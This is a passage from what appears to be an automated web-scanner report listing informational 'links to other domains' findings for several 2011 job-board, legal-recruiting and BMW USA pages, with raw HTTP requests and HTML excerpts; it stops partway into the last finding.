                               <a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
</a> |
                                    <a href="http://www.employmentcrossing.com/lcterms.php" target="_blank">Terms of Use</a>
...[SNIP]...
</a> |
                               <a href="http://www.hound.com/" target="_blank">Job Search Engine |
                               <a href="http://www.100kcrossing.com/sitemap.php">
...[SNIP]...
<br>
                                       <a href="http://www.agriculturalcrossing.com/">Agricultural Jobs</a> | <a href="http://www.designingcrossing.com/">Design Jobs</a> | <a href="http://www.disabilitycrossing.com/">Disabled Professionals Jobs</a> | <a href="http://www.diversitycrossing.com/">Diversity Jobs</a> | <a href="http://www.dubaicrossing.com/">Dubai Jobs</a> | <a href="http://www.energycrossing.com/">Energy Jobs</a> | <a href="http://www.governmentcrossing.com/">Government Jobs</a> | <a href="http://www.hourlycrossing.com/">Hourly Jobs</a> | <a href="http://www.militarycrossing.com/">Military Jobs</a> | <a href="http://www.oilandgascrossing.com/">Oil And Gas Jobs</a> | <a href="http://www.postdoctoralfellowcrossing.com/">Postdoctoral Fellow Jobs</a> | <a href="http://www.retirementcrossing.com/">Retirement Jobs</a> | <a href="http://www.waterplantcrossing.com/">Water Plant Jobs</a>
...[SNIP]...
<td align="center"><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://images.employmentcrossing.com/logo_es.jpg" width="163" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute"></a>
...[SNIP]...
<td height="7"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="9"><img src="http://images.employmentcrossing.com/blanker.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...

14.2. http://www.aharrisonbarnes.com/hb-course/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /hb-course/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /hb-course/?utm_source=Judged&utm_medium=Banner&utm_campaign=hbcourse-thrive-212x212\ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jvnohg63snnhg1l5pelhp2vgo2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648510; expires=Sat, 21-Jan-2012 22:21:50 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afb7b597&amp;cb=559569' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=265&amp;n=afb7b597' border='0' alt='' /></a>
...[SNIP]...
<li class="cat-item cat-item-1501"><a target="_blank" href="http://www.lateralattorneyreport.com/2011/01/choosing-the-small-versus-the-large-firm/" title="Choosing The Small Versus The Large Firm">Choosing The Small Versus The Large...</a>
...[SNIP]...
<li class="cat-item cat-item-1502"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/why-most-attorneys-never-realize-their-full-potential/" title="Why Most Attorneys Never Realize Their Full Potential">Why Most Attorneys Never Realize Th...</a>
...[SNIP]...
<li class="cat-item cat-item-1503"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/the-bcg-attorney-search-difference/" title="The BCG Attorney Search Difference">The BCG Attorney Search Difference...</a>
...[SNIP]...
<li class="cat-item cat-item-1504"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/should-you-switch-practice-areas/" title="Should You Switch Practice Areas">Should You Switch Practice Areas...</a>
...[SNIP]...
<li class="cat-item cat-item-1505"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/big-changes-on-the-legal-scene-layoffs-and-outsourcing/" title="Big Changes on The Legal Scene: Layoffs and Outsourcing">Big Changes on The Legal Scene: Lay...</a>
...[SNIP]...
<li class="cat-item cat-item-1506"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/11/handling-references-a-basic-guideline/" title="Handling References: A Basic Guideline">Handling References: A Basic Guidel...</a>
...[SNIP]...
<li class="cat-item cat-item-1507"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/the-marketability-of-insurance-lawyers/" title="The Marketability of Insurance Lawyers">The Marketability of Insurance Lawy...</a>
...[SNIP]...
<li class="cat-item cat-item-1508"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/moving-your-practice-and-portable-business-to-another-law-firm/" title="Moving Your Practice (and Portable Business) to Another Law Firm">Moving Your Practice (and Portable ...</a>
...[SNIP]...
<li class="cat-item cat-item-1509"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/what-qualitiescharacteristics-should-i-look-for-in-a-legal-recruiter/" title="What Qualities/Characteristics Should I Look for in a Legal Recruiter?">What Qualities/Characteristics Shou...</a>
...[SNIP]...
<li class="cat-item cat-item-1510"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/take-your-career-to-dubai-hong-kong-and-abroad/" title="Take Your Career to Dubai, Hong Kong and Abroad">Take Your Career to Dubai, Hong Kon...</a>
...[SNIP]...
<div class="Normal" style="text-align: center; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;"><a href="http://www.1shoppingcart.com/SecureCart/SecureCart.aspx?mid=5B755568-CA79-4722-A277-1C4534523A6A&amp;pid=45793872a819482f8fe5dfeebbc6de67&amp;bn=1"><span style="color: blue; text-decoration: none;">
...[SNIP]...
<div id="footerLinks">
       <a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png" width="164" height="45" style="margin-left: 408px; margin-right: 408px; margin-bottom: 7px; margin-top
...[SNIP]...
<li><a href="http://www.lawcrossing.com/" target="_blank">Legal Jobs</a>
...[SNIP]...
<li><a href="http://www.hound.com/" target="_blank"> Job Search Engine</a>
...[SNIP]...
<li><a href="http://www.employmentcrossing.com/" target="_blank"> Jobs</a>
...[SNIP]...
<li><a href="http://www.varana.com/" target="_blank"> Job Search</a>
...[SNIP]...
<li><a href="http://www.granted.com/" target="_blank"> Classified Ads</a>
...[SNIP]...
<li><a href="http://www.preferredresumes.com/" target="_blank"> Resume Writing Service</a>
...[SNIP]...
<li><a href="http://www.resumeboomer.com/" target="_blank"> Post Resume</a>
...[SNIP]...
<li><a href="http://www.RecruiterSubmitter.com/" target="_blank"> Send Resume</a>
...[SNIP]...
<li><a href="http://www.EmploymentAuthority.com/" target="_blank"> Resume Distribution</a>
...[SNIP]...
<li><a href="http://www.AttorneyResume.com/" target="_blank"> Legal Resume Writing</a>
...[SNIP]...
<li><a href="http://www.BCGSearch.com/" target="_blank"> Legal Recruiter</a>
...[SNIP]...
<li><a href="http://www.Judged.com/" target="_blank"> Law Firm News</a>
...[SNIP]...
<li><a href="http://www.JDJournal.com/" target="_blank"> Law News</a>
...[SNIP]...
<li><a href="http://www.JD2B.com/" target="_blank"> Law School Blog</a>
...[SNIP]...
<li><a href="http://www.LateralAttorneyReport.com/" target="_blank"> Legal Resources</a>
...[SNIP]...
<li><a href="http://www.EmploymentPotentials.com/" target="_blank"> Employment Resources</a>
...[SNIP]...

14.3. http://www.attorneyresume.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=JDJ&utm_medium=Banner&utm_campaign=Benefits300x130\ HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=r9q6qsdbdd70iag34sigvpv7m2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
<td width="52" valign="top"><a href="http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e" target="_blank"><img src="http://www.attorneyresume.com/images/img-mp3.jpg" alt="" width="52" height="58" border="0">
...[SNIP]...
<td width="88" valign="top"><a href="http://www.lawcrossing.com/pdf/The2008LawCrossingSalarySurvey.pdf" target="_blank"><img src="http://www.attorneyresume.com/images/lcsalarysurveyfree_book.gif" alt="" width="88" height="112" border="0">
...[SNIP]...
<br style="line-height:9px;">
&raquo; <a href="http://www.jdjournal.com/2011/01/20/vice-chairman-at-howrey-departs-for-dewey-leboeuf-2/" target="_blank"><strong>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab265257&amp;cb=859567' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=341&amp;n=ab265257&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a2369d89&amp;cb=963257' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=356&amp;n=a2369d89&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ae4e8f51&amp;cb=554579' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=185&amp;n=ae4e8f51' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afef5bf7&amp;cb=956589' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=327&amp;n=afef5bf7&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a11aa38b&amp;cb=554759' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=186&amp;n=a11aa38b' border='0' alt='' /></a>
...[SNIP]...
<td height="35" align="center"><a href="http://twitter.com/AttorneyResume" target="_blank"><img src="http://www.attorneyresume.com/images/twitter.jpg" border="0" alt="Twitter">
...[SNIP]...
<td><iframe src="http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/AttorneyResume/313631672127&width=263&colorscheme=light&connections=100&stream=true&header=true&height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:587px;" allowTransparency="true"></iframe>
...[SNIP]...
</a>&nbsp;|&nbsp;
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>&nbsp;|&nbsp;
<a href="http://www.bcgsearch.com" target="_blank">Legal Recruiter</a>&nbsp;|&nbsp;
<a href="http://www.lawcrossing.com" target="_blank">Legal Jobs</a>
...[SNIP]...
<br>
<a href="http://www.legalauthority.com" target="_blank">Resume Distribution Service</a>&nbsp;|&nbsp;
<a href="http://www.resumeboomer.com" target="_blank">Post Resume</a>&nbsp;|&nbsp;
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Course</a>
...[SNIP]...
</table>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...
<td align="center" height="50"><a href="http://www.employmentresearchinstitute.com" target="_blank"><img src="http://www.attorneyresume.com/images/logo_es.jpg" border="0" alt="Employment Research Institute">
...[SNIP]...
<td>
               <a href="http://www.100kcrossing.com" target="_blank">100KCrossing</a> | <a href="http://www.AccountingCrossing.com" target="_blank">AccountingCrossing</a>
...[SNIP]...
<br><a href="http://www.accountmanagementcrossing.com" target="_blank">AccountManagementCrossing</a> | <a href="http://www.ActuarialCrossing.com" target="_blank">ActuarialCrossing</a>
...[SNIP]...
<br><a href="http://www.AdminCrossing.com" target="_blank">AdminCrossing</a> | <a href="http://www.advertisingcrossing.com" target="_blank">AdvertisingCrossing</a> | <a href="http://www.AerospaceCrossing.com" target="_blank">AerospaceCrossing</a>
...[SNIP]...
<br><a href="http://www.AgriculturalCrossing.com" target="_blank">AgriculturalCrossing</a> | <a href="http://www.ArchitectureCrossing.com" target="_blank">ArchitectureCrossing</a>
...[SNIP]...
<br><a href="http://www.AuditorCrossing.com" target="_blank">AuditorCrossing</a> | <a href="http://www.AutomotiveCrossing.com" target="_blank">AutomotiveCrossing</a> | <a href="http://www.AviationCrossing.com" target="_blank">AviationCrossing</a>
...[SNIP]...
<br><a href="http://www.bcgsearch.com" target="_blank">BCG Attorney Search</a> | <a href="http://www.BilingualCrossing.com" target="_blank">BilingualCrossing</a> | <a href="http://www.BioTechCrossing.com" target="_blank">BiotechCrossing</a>
...[SNIP]...
<br><a href="http://www.BlueCollarCrossing.com" target="_blank">BlueCollarCrossing</a> | <a href="http://www.businessanalystcrossing.com" target="_blank">BusinessAnalystCrossing</a>
...[SNIP]...
<br><a href="http://www.BusinessDevelopmentCrossing.com" target="_blank">BusinessDevelopmentCrossing</a> | <a href="http://www.CallCenterCrossing.com" target="_blank">CallCenterCrossing</a>
...[SNIP]...
<br><a href="http://www.ChefCrossing.com" target="_blank">ChefCrossing</a> | <a href="http://www.CivilEngineeringCrossing.com" target="_blank">CivilEngineeringCrossing</a> | <a href="http://www.CLevelCrossing.com" target="_blank">CLevelCrossing</a> <br><a href="http://www.ClinicalResearchCrossing.com" target="_blank">ClinicalResearchCrossing</a> | <a href="http://www.ComplianceCrossing.com" target="_blank">ComplianceCrossing</a>
...[SNIP]...
<br><a href="http://www.ComputerAidedDesignCrossing.com" target="_blank">ComputerAidedDesignCrossing</a> | <a href="http://www.ConstructionCrossing.com" target="_blank">ConstructionCrossing</a>
...[SNIP]...
<br><a href="http://www.ConsultingCrossing.com" target="_blank">ConsultingCrossing</a> | <a href="http://www.ContractManagementCrossing.com" target="_blank">ContractManagementCrossing</a>
...[SNIP]...
<br><a href="http://www.CounselingCrossing.com" target="_blank">CounselingCrossing</a> | <a href="http://www.CPlusPlusCrossing.com" target="_blank">CPlusPlusCrossing</a>
...[SNIP]...
<br><a href="http://www.CustomerServiceCrossing.com" target="_blank">CustomerServiceCrossing</a> | <a href="http://www.DBACrossing.com" target="_blank">DBACrossing</a> | <a href="http://www.DentalCrossing.com" target="_blank">DentalCrossing</a> <br><a href="http://www.DesigningCrossing.com" target="_blank">DesigningCrossing</a> | <a href="http://www.DiversityCrossing.com" target="_blank">DiversityCrossing</a> | <a href="http://www.DotNetCrossing.com" target="_blank">DotNetCrossing</a> <br><a href="http://www.ECommerceCrossing.com" target="_blank">ECommerceCrossing</a> | <a href="http://www.edfed.com" target="_blank">EdFed</a> | <a href="http://www.EditingCrossing.com" target="_blank">EditingCrossing</a>
...[SNIP]...
<br><a href="http://www.EducationCrossing.com" target="_blank">EducationCrossing</a> | <a href="http://www.EmploymentAuthority.com" target="_blank">EmploymentAuthority</a>
...[SNIP]...
<br><a href="http://www.employmentcrossing.com" target="_blank">EmploymentCrossing</a> | <a href="http://www.EnergyCrossing.com" target="_blank">EnergyCrossing</a> | <a href="http://www.EngineeringCrossing.com" target="_blank">EngineeringCrossing</a>
...[SNIP]...
<br><a href="http://www.EntryLevelCrossing.com" target="_blank">EntryLevelCrossing</a> | <a href="http://www.EnvironmentalCrossing.com" target="_blank">EnvironmentalCrossing</a>
...[SNIP]...
<br><a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank">EnvironmentalSafetyHealthCrossing</a> | <a href="http://www.erpcrossing.com" target="_blank">SAPCrossing</a> <br><a href="http://www.ExecCrossing.com" target="_blank">ExecCrossing</a> | <a href="http://www.FacilitiesCrossing.com" target="_blank">FacilitiesCrossing</a>
...[SNIP]...
<br><a href="http://www.FinancialServicesCrossing.com" target="_blank">FinancialServicesCrossing</a> | <a href="http://www.FoodServicesCrossing.com" target="_blank">FoodServicesCrossing</a>
...[SNIP]...
<br><a href="http://www.FundraisingCrossing.com" target="_blank">FundraisingCrossing</a> | <a href="http://www.GISCrossing.com" target="_blank">GISCrossing</a> | <a href="http://www.GovernmentCrossing.com" target="_blank">GovernmentCrossing</a>
...[SNIP]...
<br><a href="http://www.graduateschoolloans.com" target="_blank">Graduate School Loans</a> | <a href="http://www.HealthcareCrossing.com" target="_blank">HealthcareCrossing</a>
...[SNIP]...
<br><a href="http://www.HelpDeskCrossing.com" target="_blank">HelpDeskCrossing</a> | <a href="http://www.HospitalityCrossing.com" target="_blank">HospitalityCrossing</a> | <a href="http://www.hound.com" target="_blank">Hound</a> <br><a href="http://www.hrcrossing.com" target="_blank">HRCrossing</a> | <a href="http://www.HVACCrossing.com" target="_blank">HVACCrossing</a> | <a href="http://www.InformationTechnologyCrossing.com" target="_blank">InformationTechnologyCrossing</a>
...[SNIP]...
<br><a href="http://www.insurcrossing.com" target="_blank">InsurCrossing</a> | <a href="http://www.IntellectualPropertyCrossing.com" target="_blank">IntellectualPropertyCrossing</a>
...[SNIP]...
<br><a href="http://www.InternshipCrossing.com" target="_blank">InternshipCrossing</a> | <a href="http://www.J2EECrossing.com" target="_blank">J2EECrossing</a> | <a href="http://www.jd2b.com" target="_blank">JD2B</a> | <a href="http://www.jdjournal.com" target="_blank">JDJournal</a> <br><a href="http://www.JournalismCrossing.com" target="_blank">JournalismCrossing</a> | <a href="http://www.judged.com" target="_blank">Judged</a> | <a href="http://www.lawcrossing.com" target="_blank">LawCrossing</a> | <a href="http://www.lawfirmstaff.com" target="_blank">Law Firm Staff</a> <br><a href="http://www.lawschoolloanreport.org" target="_blank">Law School Loan Report</a> | <a href="http://www.lawschoolloans.com" target="_blank">Law School Loans</a>
...[SNIP]...
<br><a href="http://www.legalauthority.com" target="_blank">Legal Authority</a> | <a href="http://www.LegalAuthorityFinancial.com" target="_blank">Legal Authority Financial</a>
...[SNIP]...
<br><a href="http://www.LogisticsCrossing.com" target="_blank">LogisticsCrossing</a> | <a href="http://www.ManagerCrossing.com" target="_blank">ManagerCrossing</a>
...[SNIP]...
<br><a href="http://www.ManufacturingCrossing.com" target="_blank">ManufacturingCrossing</a> | <a href="http://www.marketingcrossing.com" target="_blank">MarketingCrossing</a>
...[SNIP]...
<br><a href="http://www.MediaJobCrossing.com" target="_blank">MediaJobCrossing</a> | <a href="http://www.medicalschoolloans.com" target="_blank">Medical School Loans</a> | <a href="http://www.MilitaryCrossing.com" target="_blank">MilitaryCrossing</a>
...[SNIP]...
<br><a href="http://www.NursingCrossing.com" target="_blank">NursingCrossing</a> | <a href="http://www.OccupationalTherapyCrossing.com" target="_blank">OccupationalTherapyCrossing</a>
...[SNIP]...
<br><a href="http://www.operationscrossing.com" target="_blank">OperationsCrossing</a> | <a href="http://www.PartTimeCrossing.com" target="_blank">PartTimeCrossing</a>
...[SNIP]...
<br><a href="http://www.PharmaceuticalCrossing.com" target="_blank">PharmaceuticalCrossing</a> | <a href="http://www.PhysicalSecurityCrossing.com" target="_blank">PhysicalSecurityCrossing</a>
...[SNIP]...
<br><a href="http://www.PhysicalTherapyCrossing.com" target="_blank">PhysicalTherapyCrossing</a> | <a href="http://www.PlanningCrossing.com" target="_blank">PlanningCrossing</a>
...[SNIP]...
<br><a href="http://www.PostDoctoralFellowCrossing.com" target="_blank">PostdoctoralFellowCrossing</a> | <a href="http://www.prcrossing.com" target="_blank">PRCrossing</a> <br><a href="http://www.preferredresumes.com" target="_blank">Preferred Resumes</a> | <a href="http://www.ProcurementCrossing.com" target="_blank">ProcurementCrossing</a>
...[SNIP]...
<br><a href="http://www.ProductManagerCrossing.com" target="_blank">ProductManagerCrossing</a> | <a href="http://www.projectmanagementcrossing.com" target="_blank">ProjectManagementCrossing</a>
...[SNIP]...
<br><a href="http://www.PublicInterestCrossing.com" target="_blank">PublicInterestCrossing</a> | <a href="http://www.PublishingCrossing.com" target="_blank">PublishingCrossing</a>
...[SNIP]...
<br><a href="http://www.PurchasingCrossing.com" target="_blank">PurchasingCrossing</a> | <a href="http://www.qaqccrossing.com" target="_blank">QAQCCrossing</a> | <a href="http://www.RadioCrossing.com" target="_blank">RadioCrossing</a> <br><a href="http://www.realestateandlandcrossing.com" target="_blank">RealEstateAndLandCrossing</a> | <a href="http://www.RecruitingCrossing.com" target="_blank">RecruitingCrossing</a>
...[SNIP]...
<br><a href="http://www.ResearchingCrossing.com" target="_blank">ResearchingCrossing</a> | <a href="http://www.RetailCrossing.com" target="_blank">RetailCrossing</a> | <a href="http://www.sciencescrossing.com" target="_blank">SciencesCrossing</a>
...[SNIP]...
<br><a href="http://www.ScientistCrossing.com" target="_blank">ScientistCrossing</a> | <a href="http://www.sellingcrossing.com" target="_blank">SellingCrossing</a> | <a href="http://www.SQLCrossing.com" target="_blank">SQLCrossing</a> <br><a href="http://www.TeenagerCrossing.com" target="_blank">TeenagerCrossing</a> | <a href="http://www.TelecomCrossing.com" target="_blank">TelecomCrossing</a> | <a href="http://www.TradingCrossing.com" target="_blank">TradingCrossing</a>
...[SNIP]...
<br><a href="http://www.TrainingCrossing.com" target="_blank">TrainingCrossing</a> | <a href="http://www.TransportationCrossing.com" target="_blank">TransportationCrossing</a>
...[SNIP]...
<br><a href="http://www.TravelingCrossing.com" target="_blank">TravelingCrossing</a> | <a href="http://www.TruckingCrossing.com" target="_blank">TruckingCrossing</a> | <a href="http://www.TVCrossing.com" target="_blank">TVCrossing</a> <br><a href="http://www.UnderWritingCrossing.com" target="_blank">UnderwritingCrossing</a> | <a href="http://www.VeterinaryCrossing.com" target="_blank">VeterinaryCrossing</a>
...[SNIP]...
<br><a href="http://www.VolunteerCrossing.com" target="_blank">VolunteerCrossing</a> | <a href="http://www.WorkAtHomeCrossing.com" target="_blank">WorkAtHomeCrossing</a> | <a href="http://www.WritingCrossing.com" target="_blank">WritingCrossing</a>
...[SNIP]...

14.4. http://www.bcgsearch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=Trusted985x90\ HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=fngo6iuc8kl9dkavlshi7saf51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31541

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<TITLE>Attorney Jobs, Law Jobs, Legal Jobs, Legal Recruiter, Legal Search Firm
...[SNIP]...
<br style="line-height:8px;"><a href="http://www.jdjournal.com/" target="_blank"><img src="http://www.bcgsearch.com/images/logo_jdjournal.jpg" border="0" alt="JD Journal" align="right" style="border:1px solid #cccccc;">
...[SNIP]...
<td width="100%" height="255" valign="top">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="217" HEIGHT="250">
<param name="movie" value="http://www.bcgsearch.com/images/main.swf">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind&#8217;s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind&#8217;s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br style="line-height:5px;"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<br style="line-height:5px;">
<a href="http://twitter.com/BCGAttorneyJobs" target="_blank"><img src="http://www.bcgsearch.com/images/twitter.jpg" border="0" alt="Twitter" hspace="10">
...[SNIP]...
<td>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBCGSearch&amp;layout=standard&amp;show_faces=true&amp;width=250&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
</a>&nbsp;|&nbsp;
<a href="http://www.lawcrossing.com/" target="_blank">Legal Jobs</a>
...[SNIP]...
<br>
<a href="http://www.attorneyresume.com/" target="_blank">Legal Resumes</a>&nbsp;|&nbsp;
<a href="http://www.legalauthority.com/" target="_blank">Resume Distribution</a>&nbsp;|&nbsp;
<a href="http://www.lateralattorneyreport.com/" target="_blank">Lateral Attorney Report</a>&nbsp;|&nbsp;
<a href="http://www.judged.com/" target="_blank">Law Firm News</a>&nbsp;|&nbsp;
<a href="http://www.jd2b.com/" target="_blank">Law School Blog</a>&nbsp;|&nbsp;
<a href="http://www.jdjournal.com/" target="_blank">Legal News</a>
...[SNIP]...
<br>
<a href="http://www.hound.com/" target="_blank">Job Search Engine</a>&nbsp;|&nbsp;
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>
...[SNIP]...
<td align="center">
<a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.bcgsearch.com/images/logo_es.jpg" width="164" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...

14.5. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

